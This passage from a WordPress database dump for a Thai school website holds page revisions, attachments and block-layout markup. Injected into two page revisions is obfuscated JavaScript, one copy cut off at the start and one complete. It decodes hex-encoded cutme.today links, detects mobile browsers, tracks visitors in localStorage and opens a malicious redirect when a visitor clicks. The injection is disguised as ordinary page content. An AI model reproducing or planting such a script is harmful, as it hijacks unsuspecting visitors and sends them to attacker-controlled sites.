_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-05-21 12:30:59','2025-05-21 05:30:59','',484,'http://pakhaeng.ssk.in.th/?p=1267',0,'revision','',0),
(1268,1,'2025-05-21 14:57:03','2025-05-21 07:57:03','','Blue & Orange Circle Illustrative Education Logo-Photoroom','','inherit','','closed','','blue-orange-circle-illustrative-education-logo-photoroom','','','2025-05-21 14:57:03','2025-05-21 07:57:03','',871,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom.png',0,'attachment','image/png',0),
(1270,1,'2025-05-23 13:11:22','2025-05-23 06:11:22','','234156','','inherit','','closed','','234156','','','2025-05-23 13:11:22','2025-05-23 06:11:22','',593,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/234156.jpg',0,'attachment','image/jpeg',0),
(1271,1,'2025-05-23 15:50:38','2025-05-23 08:50:38','','ปกโครงสร้างและอำนาจหน้าที่','','inherit','','closed','','%e0%b8%9b%e0%b8%81%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88%e0%b8%ab%e0%b8%99%e0%b9%89','','','2025-05-23 15:50:38','2025-05-23 08:50:38','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf',0,'attachment','application/pdf',0),
(1273,1,'2025-05-23 15:51:30','2025-05-23 08:51:30','<!-- wp:file {\"id\":1271,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ปกโครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\">ปกโครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างการแบ่งส่วนราชการของหน่วยงาน','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 15:51:30','2025-05-23 08:51:30','',546,'http://pakhaeng.ssk.in.th/?p=1273',0,'revision','',0),
(1274,1,'2025-05-23 15:52:48','2025-05-23 08:52:48','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem 